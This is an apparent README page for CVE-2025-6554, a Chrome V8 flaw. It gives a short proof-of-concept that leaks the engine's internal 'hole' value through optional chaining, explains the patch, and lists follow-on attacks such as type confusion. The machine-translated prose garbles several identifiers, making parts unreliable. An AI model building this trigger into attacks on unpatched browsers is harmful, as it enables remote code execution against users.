来源

关联漏洞

介绍

# CVE-2025-6554

**CVE-2025-6554** is a vulnerability in Chrome's V8 (Engine JavaScript) interpreter (Hole Check 'inadequate control in unintended variables within expressions with optional chaining. POC (CVE-2025-6554-POC.JS) explores a flaw in the "Hole" verification mechanism in variables before use, allowing non-initialized values ​​reading-behavior that is normally blocked by a reference.

```js
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();
```

---

## Technical Explanation

### 1. Structure of the Vulnerable Code
Let x; and let y; declare local scope variables.
The Delete X line?. [Y]?. Use optional chaining to access a nestled property safely.
Problem: Variable Y is used before it was declared, which should launch a referencing, but in the pre-coordination V8, this failed silently, allowing it to capture the special value called "The Hole" (sentinel for TDZ variables-Dead Zone Temporal).
The return value (return Y) in the code should not be accessible because Y is still in TDZ. But the failure allows it.

### 2. Behavior before patch
The mechanism that avoids access to variables in TDZ is ThrowReferenceerrofhole.
Before the patch, this mechanism was invoked only once during Delete X?. [Y]?
The V8 internally marked that variable Y had already been verified as "not being a hole", but this verification was escaping from the controlled scope, and therefore was not reevaluated during the return y.

### 3. What was corrected
The patch adds another mandatory call to ThrowReferenceerrorifhole on return Y, ensuring that any attempt to access Y before the statement correctly fires a mistake.
This verification was guaranteed by the scope oilchecketscope, which was included in all calls to optionalchainnulllabelscope.

## attack flow

```Js
Delete x?. [Y]?. → Try to access Y (not initialized) → Failure to check "Hole" 
→ Y escapes as value → return y; → Capture the value of "Hole" → Debugprint reveals
```
The attacker, when capturing this "Hole", can infer on the inner state of Engine V8, facilitating attacks such as:

- Type Exploration Confusion

- Stack Manipulation

- Scope check circumstance

文件快照

 [4.0K]  /data/pocs/4ed2367714cac67ee7fe6a3a4ee49fc8e81d5782
├── [ 21K]  Exploit.js
├── [2.2K]  README.md
└── [ 933]  Test-Exploit.js

0 directories, 3 files

备注